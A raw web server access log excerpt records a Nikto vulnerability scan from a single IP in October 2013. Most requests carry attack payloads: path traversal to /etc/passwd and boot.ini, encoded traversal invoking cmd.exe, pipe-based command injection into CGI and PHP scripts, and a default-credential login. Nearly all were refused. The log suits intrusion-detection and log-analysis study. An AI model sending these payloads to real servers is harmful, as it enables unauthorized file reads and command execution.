  826. 84.56.69.222 - - [23/Oct/2013:15:31:57 +0400] "GET /names.nsf HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000435)"
  827. 84.56.69.222 - - [23/Oct/2013:15:31:57 +0400] "GET /LOGIN.PWD HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000436)"
  828. 84.56.69.222 - - [23/Oct/2013:15:31:58 +0400] "GET /USER/CONFIG.AP HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000437)"
  829. 84.56.69.222 - - [23/Oct/2013:15:31:58 +0400] "GET /webcgi/mail HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000438)"
  830. 84.56.69.222 - - [23/Oct/2013:15:31:58 +0400] "GET /scripts/mail HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000438)"
  831. 84.56.69.222 - - [23/Oct/2013:15:32:09 +0400] "GET /webcgi/nph-error.pl HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000439)"
  832. 84.56.69.222 - - [23/Oct/2013:15:32:09 +0400] "GET /scripts/nph-error.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000439)"
  833. 84.56.69.222 - - [23/Oct/2013:15:32:10 +0400] "POST /webcgi/post-query HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000440)"
  834. 84.56.69.222 - - [23/Oct/2013:15:32:10 +0400] "POST /scripts/post-query HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000440)"
  835. 84.56.69.222 - - [23/Oct/2013:15:32:10 +0400] "GET /webcgi/query HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000441)"
  836. 84.56.69.222 - - [23/Oct/2013:15:32:10 +0400] "GET /scripts/query HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000441)"
  837. 84.56.69.222 - - [23/Oct/2013:15:32:11 +0400] "GET /webcgi/test-cgi.tcl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000442)"
  838. 84.56.69.222 - - [23/Oct/2013:15:32:14 +0400] "GET /scripts/test-cgi.tcl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000442)"
  839. 84.56.69.222 - - [23/Oct/2013:15:32:36 +0400] "GET /scripts/test-env HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000443)"
  840. 84.56.69.222 - - [23/Oct/2013:15:32:38 +0400] "GET /.perf HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000444)"
  841. 84.56.69.222 - - [23/Oct/2013:15:32:39 +0400] "INDEX / HTTP/1.1" 200 47544 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000446)"
  842. 84.56.69.222 - - [23/Oct/2013:15:32:39 +0400] "GET // HTTP/1.1" 200 47544 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000447)"
  843. 84.56.69.222 - - [23/Oct/2013:15:32:43 +0400] "GET /admin-serv/config/admpw HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000448)"
  844. 84.56.69.222 - - [23/Oct/2013:15:32:43 +0400] "GET /test.php%20 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000449)"
  845. 84.56.69.222 - - [23/Oct/2013:15:32:43 +0400] "GET /*.* HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000450)"
  846. 84.56.69.222 - - [23/Oct/2013:15:32:44 +0400] "GET /cgi-bin/cgi_process HTTP/1.1" 404 279 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000451)"
  847. 84.56.69.222 - - [23/Oct/2013:15:32:44 +0400] "GET /ht_root/wwwroot/-/local/httpd$map.conf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000452)"
  848. 84.56.69.222 - - [23/Oct/2013:15:32:44 +0400] "GET /RwuMJ0yyt2 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000453)"
  849. 84.56.69.222 - - [23/Oct/2013:15:32:44 +0400] "GET /local/httpd$map.conf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000454)"
  850. 84.56.69.222 - - [23/Oct/2013:15:32:44 +0400] "GET /tree HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000455)"
  851. 84.56.69.222 - - [23/Oct/2013:15:32:44 +0400] "GET /webcgi/index.js0x70 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000456)"
  852. 84.56.69.222 - - [23/Oct/2013:15:32:45 +0400] "GET /scripts/index.js0x70 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000456)"
  853. 84.56.69.222 - - [23/Oct/2013:15:32:46 +0400] "GET /%2e/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000460)"
  854. 84.56.69.222 - - [23/Oct/2013:15:32:46 +0400] "GET /%2e/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000461)"
  855. 84.56.69.222 - - [23/Oct/2013:15:32:46 +0400] "GET /%2e/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000462)"
  856. 84.56.69.222 - - [23/Oct/2013:15:32:47 +0400] "GET /%2f/ HTTP/1.1" 404 262 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000463)"
  857. 84.56.69.222 - - [23/Oct/2013:15:32:47 +0400] "GET /%2f/ HTTP/1.1" 404 262 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000464)"
  858. 84.56.69.222 - - [23/Oct/2013:15:32:47 +0400] "GET /%2f/ HTTP/1.1" 404 262 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000465)"
  859. 84.56.69.222 - - [23/Oct/2013:15:32:47 +0400] "GET /%5c/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000466)"
  860. 84.56.69.222 - - [23/Oct/2013:15:32:47 +0400] "GET /%5c/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000467)"
  861. 84.56.69.222 - - [23/Oct/2013:15:32:47 +0400] "GET /%5c/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000468)"
  862. 84.56.69.222 - - [23/Oct/2013:15:32:47 +0400] "GET /weblogic HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000470)"
  863. 84.56.69.222 - - [23/Oct/2013:15:32:48 +0400] "GET /%a%s%p%d HTTP/1.1" 400 288 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000471)"
  864. 84.56.69.222 - - [23/Oct/2013:15:32:48 +0400] "GET /index.html%20 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000472)"
  865. 84.56.69.222 - - [23/Oct/2013:15:32:48 +0400] "GET /852566C90012664F HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000473)"
  866. 84.56.69.222 - - [23/Oct/2013:15:32:48 +0400] "GET /hidden.nsf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000474)"
  867. 84.56.69.222 - - [23/Oct/2013:15:32:48 +0400] "GET /mail.box HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000475)"
  868. 84.56.69.222 - - [23/Oct/2013:15:32:48 +0400] "GET /setup.nsf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000477)"
  869. 84.56.69.222 - - [23/Oct/2013:15:32:48 +0400] "GET /statrep.nsf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000478)"
  870. 84.56.69.222 - - [23/Oct/2013:15:32:48 +0400] "GET /webadmin.nsf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000479)"
  871. 84.56.69.222 - - [23/Oct/2013:15:32:49 +0400] "GET /webcgi/cgitest.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000480)"
  872. 84.56.69.222 - - [23/Oct/2013:15:33:09 +0400] "GET /examples/servlet/AUX HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000481)"
  873. 84.56.69.222 - - [23/Oct/2013:15:33:09 +0400] "GET /webcgi/hpnst.exe?c=p+i=SrvSystemInfo.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000482)"
  874. 84.56.69.222 - - [23/Oct/2013:15:33:10 +0400] "GET /scripts/hpnst.exe?c=p+i=SrvSystemInfo.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000482)"
  875. 84.56.69.222 - - [23/Oct/2013:15:33:11 +0400] "GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000483)"
  876. 84.56.69.222 - - [23/Oct/2013:15:33:12 +0400] "GET /Config1.htm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000484)"
  877. 84.56.69.222 - - [23/Oct/2013:15:33:12 +0400] "GET /contents/extensions/asp/1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000485)"
  878. 84.56.69.222 - - [23/Oct/2013:15:33:12 +0400] "GET /WebAdmin.dll?View=Logon HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000486)"
  879. 84.56.69.222 - - [23/Oct/2013:15:33:13 +0400] "GET /webcgi/Pbcgi.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000487)"
  880. 84.56.69.222 - - [23/Oct/2013:15:33:13 +0400] "GET /scripts/Pbcgi.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000487)"
  881. 84.56.69.222 - - [23/Oct/2013:15:33:13 +0400] "GET /webcgi/testcgi.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000488)"
  882. 84.56.69.222 - - [23/Oct/2013:15:33:14 +0400] "GET /scripts/testcgi.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000488)"
  883. 84.56.69.222 - - [23/Oct/2013:15:33:14 +0400] "GET /cgi-win/cgitest.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000489)"
  884. 84.56.69.222 - - [23/Oct/2013:15:33:14 +0400] "GET /c/winnt/system32/cmd.exe?/c+dir+/OG HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000491)"
  885. 84.56.69.222 - - [23/Oct/2013:15:33:15 +0400] "GET /webcgi/snorkerz.bat HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000492)"
  886. 84.56.69.222 - - [23/Oct/2013:15:33:22 +0400] "GET /scripts/snorkerz.bat HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000492)"
  887. 84.56.69.222 - - [23/Oct/2013:15:33:22 +0400] "GET /webcgi/snorkerz.cmd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000493)"
  888. 84.56.69.222 - - [23/Oct/2013:15:33:22 +0400] "GET /scripts/snorkerz.cmd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000493)"
  889. 84.56.69.222 - - [23/Oct/2013:15:33:22 +0400] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000494)"
  890. 84.56.69.222 - - [23/Oct/2013:15:33:23 +0400] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000495)"
  891. 84.56.69.222 - - [23/Oct/2013:15:33:23 +0400] "GET /msadc/samples/adctest.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000496)"
  892. 84.56.69.222 - - [23/Oct/2013:15:33:23 +0400] "GET /3zGekRbbVV HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000497)"
  893. 84.56.69.222 - - [23/Oct/2013:15:33:24 +0400] "GET /somethingnotthere.ida HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000498)"
  894. 84.56.69.222 - - [23/Oct/2013:15:33:25 +0400] "GET /webcgi/webfind.exe?keywords=01234567890123456789 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000500)"
  895. 84.56.69.222 - - [23/Oct/2013:15:33:25 +0400] "GET /scripts/webfind.exe?keywords=01234567890123456789 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000500)"
  896. 84.56.69.222 - - [23/Oct/2013:15:33:26 +0400] "GET /cgi-shl/win-c-sample.exe HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000501)"
  897. 84.56.69.222 - - [23/Oct/2013:15:33:27 +0400] "GET /examples/servlet/TroubleShooter HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000502)"
  898. 84.56.69.222 - - [23/Oct/2013:15:33:27 +0400] "GET /webcgi/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000503)"
  899. 84.56.69.222 - - [23/Oct/2013:15:33:28 +0400] "GET /scripts/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000503)"
  900. 84.56.69.222 - - [23/Oct/2013:15:33:28 +0400] "GET /webcgi/ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000504)"
  901. 84.56.69.222 - - [23/Oct/2013:15:33:28 +0400] "GET /scripts/ans/ans.pl?p=../../../../../usr/bin/id|&blah HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000504)"
  902. 84.56.69.222 - - [23/Oct/2013:15:33:28 +0400] "GET /goform/CheckLogin?login=root&password=tslinux HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000505)"
  903. 84.56.69.222 - - [23/Oct/2013:15:33:29 +0400] "GET /[SecCheck]/..%255c..%255c../ext.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000507)"
  904. 84.56.69.222 - - [23/Oct/2013:15:33:29 +0400] "GET /[SecCheck]/..%252f..%252f../ext.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000508)"
  905. 84.56.69.222 - - [23/Oct/2013:15:33:29 +0400] "GET /cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\\winnt\\win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000509)"
  906. 84.56.69.222 - - [23/Oct/2013:15:33:29 +0400] "GET /cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\\windows\\win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000510)"
  907. 84.56.69.222 - - [23/Oct/2013:15:33:30 +0400] "GET /.nsf/../winnt/win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000511)"
  908. 84.56.69.222 - - [23/Oct/2013:15:33:30 +0400] "GET /prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000512)"
  909. 84.56.69.222 - - [23/Oct/2013:15:33:30 +0400] "GET /query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000513)"
  910. 84.56.69.222 - - [23/Oct/2013:15:33:31 +0400] "GET /iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000514)"
  911. 84.56.69.222 - - [23/Oct/2013:15:33:31 +0400] "GET /iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000515)"
  912. 84.56.69.222 - - [23/Oct/2013:15:33:32 +0400] "GET /default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000516)"
  913. 84.56.69.222 - - [23/Oct/2013:15:33:50 +0400] "GET /default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000517)"
  914. 84.56.69.222 - - [23/Oct/2013:15:33:50 +0400] "GET /................../config.sys HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000518)"
  915. 84.56.69.222 - - [23/Oct/2013:15:33:50 +0400] "GET /cfdocs/exampleapp/email/getfile.cfm?filename=c:\\boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000519)"
  916. 84.56.69.222 - - [23/Oct/2013:15:33:50 +0400] "GET /cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\\boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000520)"
  917. 84.56.69.222 - - [23/Oct/2013:15:33:51 +0400] "GET /cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\\boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000521)"
  918. 84.56.69.222 - - [23/Oct/2013:15:33:51 +0400] "GET /netget?sid=user&msg=300&file=../../../../../../../../../boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000522)"
  919. 84.56.69.222 - - [23/Oct/2013:15:33:51 +0400] "GET /netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000523)"
  920. 84.56.69.222 - - [23/Oct/2013:15:33:52 +0400] "GET /php/php.exe?c:\\winnt\\boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000524)"
  921. 84.56.69.222 - - [23/Oct/2013:15:33:53 +0400] "GET /phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000525)"
  922. 84.56.69.222 - - [23/Oct/2013:15:33:54 +0400] "GET /scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000526)"
  923. 84.56.69.222 - - [23/Oct/2013:15:33:54 +0400] "GET /us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\\boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000527)"
  924. 84.56.69.222 - - [23/Oct/2013:15:33:54 +0400] "GET /wx/s.dll?d=/boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000528)"
  925. 84.56.69.222 - - [23/Oct/2013:15:33:54 +0400] "GET /webcgi/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000529)"
  926. 84.56.69.222 - - [23/Oct/2013:15:33:55 +0400] "GET /scripts/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000529)"
  927. 84.56.69.222 - - [23/Oct/2013:15:33:56 +0400] "GET /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000531)"
  928. 84.56.69.222 - - [23/Oct/2013:15:33:56 +0400] "GET /webcgi/SQLServ/sqlbrowse.asp?filepath=c:\\&Opt=3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000532)"
  929. 84.56.69.222 - - [23/Oct/2013:15:33:56 +0400] "GET /scripts/SQLServ/sqlbrowse.asp?filepath=c:\\&Opt=3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000532)"
  930. 84.56.69.222 - - [23/Oct/2013:15:33:57 +0400] "GET /webcgi/stats/statsbrowse.asp?filepath=c:\\&Opt=3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000533)"
  931. 84.56.69.222 - - [23/Oct/2013:15:33:57 +0400] "GET /scripts/stats/statsbrowse.asp?filepath=c:\\&Opt=3 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000533)"
  932. 84.56.69.222 - - [23/Oct/2013:15:33:58 +0400] "GET /webcgi/test.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000534)"
  933. 84.56.69.222 - - [23/Oct/2013:15:33:59 +0400] "GET /scripts/test.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000534)"
  934. 84.56.69.222 - - [23/Oct/2013:15:33:59 +0400] "GET /webcgi/tst.bat|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\, HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000535)"
  935. 84.56.69.222 - - [23/Oct/2013:15:33:59 +0400] "GET /scripts/tst.bat|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\, HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000535)"
  936. 84.56.69.222 - - [23/Oct/2013:15:34:00 +0400] "GET /webcgi/input.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000536)"
  937. 84.56.69.222 - - [23/Oct/2013:15:34:01 +0400] "GET /scripts/input.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000536)"
  938. 84.56.69.222 - - [23/Oct/2013:15:34:01 +0400] "GET /webcgi/input2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000537)"
  939. 84.56.69.222 - - [23/Oct/2013:15:34:01 +0400] "GET /scripts/input2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000537)"
  940. 84.56.69.222 - - [23/Oct/2013:15:34:02 +0400] "GET /ssi/envout.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000538)"
  941. 84.56.69.222 - - [23/Oct/2013:15:34:02 +0400] "GET /php/php.exe?c:\\boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000539)"
  942. 84.56.69.222 - - [23/Oct/2013:15:34:03 +0400] "GET /..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000542)"
  943. 84.56.69.222 - - [23/Oct/2013:15:34:03 +0400] "GET ///etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000543)"
  944. 84.56.69.222 - - [23/Oct/2013:15:34:03 +0400] "GET ///etc/hosts HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000544)"
  945. 84.56.69.222 - - [23/Oct/2013:15:34:03 +0400] "GET /.cobalt/sysManage/../admin/.htaccess HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000546)"
  946. 84.56.69.222 - - [23/Oct/2013:15:34:05 +0400] "GET /albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000547)"
  947. 84.56.69.222 - - [23/Oct/2013:15:34:05 +0400] "GET /autohtml.php?op=modload&mainfile=x&name=/etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000548)"
  948. 84.56.69.222 - - [23/Oct/2013:15:34:05 +0400] "GET /atomicboard/index.php?location=../../../../../../../../../../etc/passwd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000549)"
  949. 84.56.69.222 - - [23/Oct/2013:15:34:07 +0400] "GET /current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000550)"
  950. 84.56.69.222 - - [23/Oct/2013:15:34:07 +0400] "GET /current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000551)"
